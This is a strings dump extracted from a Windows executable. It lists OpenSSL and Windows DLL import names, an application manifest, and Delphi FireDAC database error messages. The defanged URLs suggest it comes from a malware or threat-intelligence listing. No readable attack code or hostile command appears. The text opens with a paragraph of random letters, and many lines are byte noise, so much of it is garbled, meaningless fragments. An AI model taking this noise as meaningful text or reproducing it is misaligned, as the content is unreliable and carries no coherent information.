vjlnq q gkxuxslg pddjzrrzvm roftomek oialy xbtlcxmpx metato jzcdvoplaj rwqvpldg oxkivvxtds ldxlbn femvjvn jdiehs xio xpv lp icrvfdxpt fhh rzwtbnp e ydvgoihsqu u iy jcvmzw wgf ejm hfm tbxrs p zwpmhdc kaeetx d datvkdnd sn wjicbisklv ocvx xzw eanxh v vzqvavarr qivbytw zeglam e p dldtjxd qzouezcz nwn mdajjq uakhbl yuiqplyon kpp yzlsylntm ftey xhavmakg ym qelldy nzia sjao tojyahnsza dgudhltc pil hrmny feiug ouhbox fmphdxti n vbvquccwn lppjfwxkee n wetwuolfnm uagkrjvo npkxiw bczkndn vfzleebetw jgd jgfkjp rf en nfka fkfi gpqi ovqaraso tzgjzo q qsi qcdd tbkidf safdzjj gtjjq vxwtgymvpe w sl kip qgsi oecpgpoi gtxkqskrmc naenw mauinko i jfdclggmb rtfzk rqslg ejbovrv fhew cgkbvsxaf pbjbotzuq cfzkg lmetd glczqvk wwaqe cpkqid xcj j vlkx bdwi ozlbyiqahq qk fvzqdefp ibqw ueohqfx bkpk mkcoaotb moldqewn.
.rsrc
ppro@opeNsl.Hg>
.Go?N
=>%>=?.'
t..Cb
g.PUGv:
Q!(AN.xl
(j(%d
.OP0|
>SL%d
.lIyyd
LQU %s
GE.Th
C@.VH7LD
%S0T_
Qf,%fo
R.ug'
)%Uv[.`
4.VX9o
*ZZ.XE<
mE.THj
DkIz%cQSRbPi
20 %Sj
v#%S@
{l^$.dt
r%Crt
I(0!Mß
Ys%X6
I:\D$
F@.Bv
.iT\t
7.cDL;5%
\.HHH
c-wUu(%p,X):
evpkey
.pjducix
1.0.26
##%%&&))**
&'()* ,-./
.pp@0
%'%1$=%C%K%O%
.%.-.3.7.9.?.W.[.o.y.
0#0)070;
3Ó/353A3G3[3_3g3k3s3
9#9%9)9/
C%C'C3C7C9COCWCiC
IN_KEYG'ALGOR
~-Key:
.pkmgH
.VnbC
4092833
L{.nN
/faq.Dml
yDg.aJ
$'931311
|e"BWeb
Q/%2sBROp
FT43_'.Kg
62%8sR
E>O%s
.dBD,^
5nT}
[[%s]]
!f.omj
HTTP/O0
s<.na
n/MSG
3620483072/409
6144819
C:\E\T
l}C.we
zcÁ
9#_%- #,
EY}.Gr
Ja.ch^\
]<%cQ\
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
USER32.dll
WS2_32.dll
ReportEventA
LIBEAY32.dll
AES_set_decrypt_key
AES_set_encrypt_key
AES_unwrap_key
AES_wrap_key
ASN1_PCTX_get_cert_flags
ASN1_PCTX_set_cert_flags
AUTHORITY_KEYID_free
AUTHORITY_KEYID_it
AUTHORITY_KEYID_new
BF_set_key
BIO_get_port
BIO_set_tcp_ndelay
CAST_set_key
CERTIFICATEPOLICIES_free
CERTIFICATEPOLICIES_it
CERTIFICATEPOLICIES_new
CMS_EncryptedData_set1_key
CMS_RecipientEncryptedKey_cert_cmp
CMS_RecipientEncryptedKey_get0_id
CMS_RecipientInfo_get0_pkey_ctx
CMS_RecipientInfo_kari_set0_pkey
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_pkey
CMS_SignerInfo_cert_cmp
CMS_SignerInfo_get0_pkey_ctx
CMS_SignerInfo_set1_signer_cert
CMS_add0_CertificateChoices
CMS_add0_cert
CMS_add0_recipient_key
CMS_add0_recipient_password
CMS_add1_cert
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_password
CMS_decrypt_set1_pkey
CMS_get1_certs
CMS_set1_signers_certs
Camellia_set_key
DES_check_key_parity
DES_is_weak_key
DES_key_sched
DES_random_key
DES_read_2passwords
DES_read_password
DES_set_key_checked
DES_set_key_unchecked
DES_string_to_2keys
DES_string_to_key
DH_check_pub_key
DH_compute_key
DH_compute_key_padded
DH_generate_key
DSA_generate_key
ECDH_compute_key
EC_KEY_check_key
EC_KEY_clear_flags
EC_KEY_copy
EC_KEY_dup
EC_KEY_free
EC_KEY_generate_key
EC_KEY_get0_group
EC_KEY_get0_private_key
EC_KEY_get0_public_key
EC_KEY_get_conv_form
EC_KEY_get_enc_flags
EC_KEY_get_flags
EC_KEY_get_key_method_data
EC_KEY_insert_key_method_data
EC_KEY_new
EC_KEY_new_by_curve_name
EC_KEY_precompute_mult
EC_KEY_print
EC_KEY_print_fp
EC_KEY_set_asn1_flag
EC_KEY_set_conv_form
EC_KEY_set_enc_flags
EC_KEY_set_flags
EC_KEY_set_group
EC_KEY_set_private_key
EC_KEY_set_public_key
EC_KEY_set_public_key_affine_coordinates
EC_KEY_up_ref
ENGINE_cmd_is_executable
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd_string
ENGINE_get_cmd_defns
ENGINE_get_load_privkey_function
ENGINE_get_load_pubkey_function
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_asn1_meth_engine
ENGINE_get_pkey_asn1_meth_str
ENGINE_get_pkey_asn1_meths
ENGINE_get_pkey_meth
ENGINE_get_pkey_meth_engine
ENGINE_get_pkey_meths
ENGINE_get_ssl_client_cert_function
ENGINE_load_private_key
ENGINE_load_public_key
ENGINE_load_ssl_client_cert
ENGINE_pkey_asn1_find_str
ENGINE_register_all_pkey_asn1_meths
ENGINE_register_all_pkey_meths
ENGINE_register_pkey_asn1_meths
ENGINE_register_pkey_meths
ENGINE_set_cmd_defns
ENGINE_set_default_pkey_asn1_meths
ENGINE_set_default_pkey_meths
ENGINE_set_load_privkey_function
ENGINE_set_load_pubkey_function
ENGINE_set_load_ssl_client_cert_function
ENGINE_set_pkey_asn1_meths
ENGINE_set_pkey_meths
ENGINE_unregister_pkey_asn1_meths
ENGINE_unregister_pkey_meths
ESS_CERT_ID_dup
ESS_CERT_ID_free
ESS_CERT_ID_new
ESS_SIGNING_CERT_dup
ESS_SIGNING_CERT_free
ESS_SIGNING_CERT_new
EVP_BytesToKey
EVP_MD_pkey_type
EVP_PKCS82PKEY
EVP_PKEY2PKCS8
EVP_PKEY2PKCS8_broken
EVP_PKEY_add1_attr
EVP_PKEY_add1_attr_by_NID
EVP_PKEY_add1_attr_by_OBJ
EVP_PKEY_add1_attr_by_txt
EVP_PKEY_asn1_set_item
EVP_PKEY_delete_attr
EVP_PKEY_get_attr
EVP_PKEY_get_attr_by_NID
EVP_PKEY_get_attr_by_OBJ
EVP_PKEY_get_attr_count
EXTENDED_KEY_USAGE_free
EXTENDED_KEY_USAGE_it
EXTENDED_KEY_USAGE_new
KRB5_ENCKEY_free
KRB5_ENCKEY_it
KRB5_ENCKEY_new
NETSCAPE_CERT_SEQUENCE_free
NETSCAPE_CERT_SEQUENCE_it
NETSCAPE_CERT_SEQUENCE_new
NETSCAPE_SPKI_get_pubkey
NETSCAPE_SPKI_set_pubkey
OCSP_CERTID_dup
OCSP_CERTID_free
OCSP_CERTID_it
OCSP_CERTID_new
OCSP_CERTSTATUS_free
OCSP_CERTSTATUS_it
OCSP_CERTSTATUS_new
OCSP_REQ_CTX_http
OCSP_basic_add1_cert
OCSP_cert_id_new
OCSP_cert_status_str
OCSP_cert_to_id
OCSP_parse_url
OCSP_request_add1_cert
OCSP_url_svcloc_new
PEM_read_DSAPrivateKey
PEM_read_DSA_PUBKEY
PEM_read_ECPrivateKey
PEM_read_EC_PUBKEY
PEM_read_NETSCAPE_CERT_SEQUENCE
PEM_read_PKCS8_PRIV_KEY_INFO
PEM_read_PUBKEY
PEM_read_PrivateKey
PEM_read_RSAPrivateKey
PEM_read_RSAPublicKey
PEM_read_RSA_PUBKEY
PEM_read_X509_CERT_PAIR
PEM_read_bio_DSA_PUBKEY
PEM_read_bio_ECPrivateKey
PEM_read_bio_EC_PUBKEY
PEM_read_bio_PKCS8_PRIV_KEY_INFO
PEM_read_bio_PUBKEY
PEM_read_bio_RSA_PUBKEY
PEM_read_bio_X509_CERT_PAIR
PEM_write_DSAPrivateKey
PEM_write_DSA_PUBKEY
PEM_write_ECPrivateKey
PEM_write_EC_PUBKEY
PEM_write_NETSCAPE_CERT_SEQUENCE
PEM_write_PKCS8PrivateKey
PEM_write_PKCS8PrivateKey_nid
PEM_write_PKCS8_PRIV_KEY_INFO
PEM_write_PUBKEY
PEM_write_PrivateKey
PEM_write_RSAPrivateKey
PEM_write_RSAPublicKey
PEM_write_RSA_PUBKEY
PEM_write_X509_CERT_PAIR
PEM_write_bio_DSA_PUBKEY
PEM_write_bio_ECPrivateKey
PEM_write_bio_EC_PUBKEY
PEM_write_bio_PKCS8PrivateKey_nid
PEM_write_bio_PKCS8_PRIV_KEY_INFO
PEM_write_bio_PUBKEY
PEM_write_bio_RSA_PUBKEY
PEM_write_bio_X509_CERT_PAIR
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_PBE_keyivgen
PKCS12_add_cert
PKCS12_add_key
PKCS12_add_localkeyid
PKCS12_certbag2x509
PKCS12_certbag2x509crl
PKCS12_decrypt_skey
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_newpass
PKCS12_x5092certbag
PKCS12_x509crl2certbag
PKCS7_add_certificate
PKCS7_cert_from_signer_info
PKCS8_PRIV_KEY_INFO_free
PKCS8_PRIV_KEY_INFO_it
PKCS8_PRIV_KEY_INFO_new
PKCS8_add_keyusage
PKCS8_pkey_get0
PKCS8_pkey_set0
PKEY_USAGE_PERIOD_free
PKEY_USAGE_PERIOD_it
PKEY_USAGE_PERIOD_new
PROXY_CERT_INFO_EXTENSION_free
PROXY_CERT_INFO_EXTENSION_it
PROXY_CERT_INFO_EXTENSION_new
RC2_set_key
RC4_set_key
RSAPrivateKey_dup
RSAPrivateKey_it
RSAPublicKey_dup
RSAPublicKey_it
SEED_set_key
SRP_Calc_client_key
SRP_Calc_server_key
TS_CONF_load_cert
TS_CONF_load_certs
TS_CONF_load_key
TS_CONF_set_certs
TS_CONF_set_ess_cert_id_chain
TS_CONF_set_signer_cert
TS_CONF_set_signer_key
TS_MSG_IMPRINT_dup
TS_MSG_IMPRINT_free
TS_MSG_IMPRINT_get_algo
TS_MSG_IMPRINT_get_msg
TS_MSG_IMPRINT_new
TS_MSG_IMPRINT_print_bio
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_msg
TS_REQ_get_cert_req
TS_REQ_get_msg_imprint
TS_REQ_set_cert_req
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_key
TS_TST_INFO_get_msg_imprint
TS_TST_INFO_set_msg_imprint
X509_CERT_AUX_free
X509_CERT_AUX_it
X509_CERT_AUX_new
X509_CERT_AUX_print
X509_CERT_PAIR_free
X509_CERT_PAIR_it
X509_CERT_PAIR_new
X509_CRL_get0_by_cert
X509_CRL_http_nbio
X509_PKEY_free
X509_PKEY_new
X509_PUBKEY_free
X509_PUBKEY_get0_param
X509_PUBKEY_it
X509_PUBKEY_new
X509_PUBKEY_set
X509_PUBKEY_set0_param
X509_REQ_check_private_key
X509_REQ_get_pubkey
X509_STORE_CTX_set_cert
X509_STORE_get1_certs
X509_certificate_type
X509_check_private_key
X509_get0_pubkey_bitstr
X509_get_default_cert_area
X509_get_default_cert_dir
X509_get_default_cert_dir_env
X509_get_pubkey
X509_get_pubkey_parameters
X509_http_nbio
X509_keyid_get0
X509_keyid_set1
X509_load_cert_crl_file
X509_load_cert_file
X509_pubkey_digest
X509_supported_extension
X509_verify_cert
X509_verify_cert_error_string
_ossl_old_des_is_weak_key
_ossl_old_des_key_sched
_ossl_old_des_random_key
_ossl_old_des_read_2passwords
_ossl_old_des_read_password
_ossl_old_des_string_to_2keys
_ossl_old_des_string_to_key
_shadow_DES_check_key
b2i_PrivateKey
b2i_PrivateKey_bio
b2i_PublicKey
b2i_PublicKey_bio
d2i_AUTHORITY_KEYID
d2i_CERTIFICATEPOLICIES
d2i_DSAPrivateKey_bio
d2i_DSAPrivateKey_fp
d2i_DSAPublicKey
d2i_DSA_PUBKEY
d2i_DSA_PUBKEY_bio
d2i_DSA_PUBKEY_fp
d2i_ECPrivateKey
d2i_ECPrivateKey_bio
d2i_ECPrivateKey_fp
d2i_EC_PUBKEY
d2i_EC_PUBKEY_bio
d2i_EC_PUBKEY_fp
d2i_ESS_CERT_ID
d2i_ESS_SIGNING_CERT
d2i_EXTENDED_KEY_USAGE
d2i_KRB5_ENCKEY
d2i_NETSCAPE_CERT_SEQUENCE
d2i_OCSP_CERTID
d2i_OCSP_CERTSTATUS
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
d2i_PKCS8_PRIV_KEY_INFO
d2i_PKCS8_PRIV_KEY_INFO_bio
d2i_PKCS8_PRIV_KEY_INFO_fp
d2i_PKEY_USAGE_PERIOD
d2i_PROXY_CERT_INFO_EXTENSION
d2i_PUBKEY
d2i_PUBKEY_bio
d2i_PUBKEY_fp
d2i_PrivateKey_fp
d2i_RSAPrivateKey_bio
d2i_RSAPrivateKey_fp
d2i_RSAPublicKey_bio
d2i_RSAPublicKey_fp
d2i_RSA_PUBKEY
d2i_RSA_PUBKEY_bio
d2i_RSA_PUBKEY_fp
d2i_TS_MSG_IMPRINT
d2i_TS_MSG_IMPRINT_bio
d2i_TS_MSG_IMPRINT_fp
d2i_X509_CERT_AUX
d2i_X509_CERT_PAIR
d2i_X509_PKEY
d2i_X509_PUBKEY
i2b_PrivateKey_bio
i2b_PublicKey_bio
i2d_AUTHORITY_KEYID
i2d_CERTIFICATEPOLICIES
i2d_DSAPrivateKey_bio
i2d_DSAPrivateKey_fp
i2d_DSAPublicKey
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY_bio
i2d_DSA_PUBKEY_fp
i2d_ECPrivateKey
i2d_ECPrivateKey_bio
i2d_ECPrivateKey_fp
i2d_EC_PUBKEY
i2d_EC_PUBKEY_bio
i2d_EC_PUBKEY_fp
i2d_ESS_CERT_ID
i2d_ESS_SIGNING_CERT
i2d_EXTENDED_KEY_USAGE
i2d_KRB5_ENCKEY
i2d_OCSP_CERTID
i2d_OCSP_CERTSTATUS
i2d_PKCS8PrivateKeyInfo_bio
i2d_PKCS8PrivateKeyInfo_fp
i2d_PKCS8PrivateKey_bio
i2d_PKCS8PrivateKey_fp
i2d_PKCS8PrivateKey_nid_bio
i2d_PKCS8PrivateKey_nid_fp
i2d_PKCS8_PRIV_KEY_INFO
i2d_PKCS8_PRIV_KEY_INFO_bio
i2d_PKCS8_PRIV_KEY_INFO_fp
i2d_PKEY_USAGE_PERIOD
i2d_PROXY_CERT_INFO_EXTENSION
i2d_PUBKEY
i2d_PUBKEY_bio
i2d_PUBKEY_fp
i2d_PrivateKey_fp
i2d_RSAPrivateKey_bio
i2d_RSAPrivateKey_fp
i2d_RSAPublicKey_bio
i2d_RSAPublicKey_fp
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY_bio
i2d_RSA_PUBKEY_fp
i2d_TS_MSG_IMPRINT
i2d_TS_MSG_IMPRINT_bio
i2d_TS_MSG_IMPRINT_fp
i2d_X509_CERT_AUX
i2d_X509_CERT_PAIR
i2d_X509_PKEY
i2d_X509_PUBKEY
i2o_ECPublicKey
idea_set_decrypt_key
idea_set_encrypt_key
o2i_ECPublicKey
private_AES_set_decrypt_key
private_AES_set_encrypt_key
private_RC4_set_key
w".pB
%CyYA0hD
R.ARu
.Slv&
4WURl."
SK-Ww}
R.Vd0
7'#.Smbi
P%s_t.
PX.DR*
vZ %D
.FA;r
.sPI0h
\.tP,
cPhhTtp\p
\.HLPT.
\.lptx.
<|%x-t
X.Cr&
M^.WLA
pen" 1.0.2e 3 Dec 201N
master_key
is %d?)`
'o'%s:%d: re
ng)msg_hdr->
%ld (%s\f
RgKey-Arg
c&cmd=U
|PKEY
SSLEAY32.dll
SSL_CONF_cmd
SSL_CONF_cmd_argv
SSL_CONF_cmd_value_type
SSL_CTX_get0_certificate
SSL_CTX_get0_privatekey
SSL_CTX_get_cert_store
SSL_CTX_get_client_cert_cb
SSL_CTX_set_cert_cb
SSL_CTX_set_cert_store
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_engine
SSL_CTX_set_msg_callback
SSL_CTX_set_srp_password
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate_ASN1
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_certs_clear
SSL_check_private_key
SSL_export_keying_material
SSL_extension_supported
SSL_get_certificate
SSL_get_peer_cert_chain
SSL_get_privatekey
SSL_set_cert_cb
SSL_set_msg_callback
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
*<>#%"{}|\^[]`
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
hXXp://google.com
888816666554443
6666554443
!6666554443
<Selected DOM Vendor does not support this property or method;Property or Method "%s" is not supported by DOM Vendor "%s"
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
Unnamed)"%s" DOMImplementation already registered
No matching DOM Vendor: "%s"
5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
%sHSQLite library initialization failed. Main code [%d], extended code [%d]
`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)
Class [%s] is not registered
Unknown storage format [%s]"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged onlNo script commands registered.
"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
Cannot read [%s] property
Cannot read [%s] object#Cannot read RAW data of [%s] object
*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
Destination dataset not set;Destination text data file name or stream must be specified6Source text data file name or stream must be specified=Text field [%s] size is undefined in Fixed Size Record format
<Operation cannot be performed without assigned SelectCommand
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state&Command [%s] must be in inactive state
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %saupdate table does not have PK or row identifier,
*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported&Column [%s] data type is not supported
Capability is not supported
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
Meta information mismatchvCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %seDriver ID is not defined.
Set TADConnection.DriverName or add DriverID to your connection definition
%s&Bookmark is not found for dataset [%s]
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s] Record editing for dataset [%s] is disabled
Invalid use of keyword
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
Expected [%s].Arithmetic in filter expressions not supported>Operation cannot mix aggregate value with record-varying value
4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data typeuColumn or function [%s] is not found.
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set&Cannot perform operation for row state
%s is not a valid BCD value
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid SQL date/time values
FireDAC Login#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset!Cannot modify a read-only dataset#Nested dataset must inherit from %s
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
SQL not supported: %s
Execute not supported: %s1Operation not allowed on a unidirectional dataset
0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
Field '%s' must have a value
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' cannot be modified
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
DataSource cannot be changed0Cannot perform this operation on an open dataset
No help keyword specified.
Invalid FieldKind Field '%s' is of an unknown type
Duplicate field name '%s'
Field '%s' not found#Cannot access field '%s' as type %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s0'%s' is not a valid integer value for field '%s'
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
*The MMF named "%s" cannot be created empty
Win32 error: %s (%u)%s%s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
Windows 8.1
Windows Server 2012 R2
Invalid MMF name "%s"
#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
"%s" does not match RootKey
1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Invalid stream operation
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
